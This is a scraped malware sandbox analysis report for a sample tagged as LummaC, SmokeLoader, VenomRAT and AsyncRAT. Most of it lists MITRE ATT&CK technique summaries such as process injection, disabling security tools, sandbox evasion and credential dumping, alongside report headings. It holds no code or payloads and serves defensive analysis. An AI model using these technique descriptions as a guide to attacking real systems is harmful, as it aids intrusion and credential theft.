Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: SmokeLoader

Threatname: VenomRAT

Threatname: AsyncRAT

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_lm.exe_ed6b1a814e4ec1e6e89791b3995c66bc9bb83_5fe582ea_8fc838e2-163f-4116-9bba-412c9028ec49\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vm.exe_12b9a62f7c411e90f74ee59af3dcf249dad3f7e8_19c5d0bb_9c16da23-e6dd-4840-9566-709d498b9789\Report.wer

Windows Analysis Report
e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre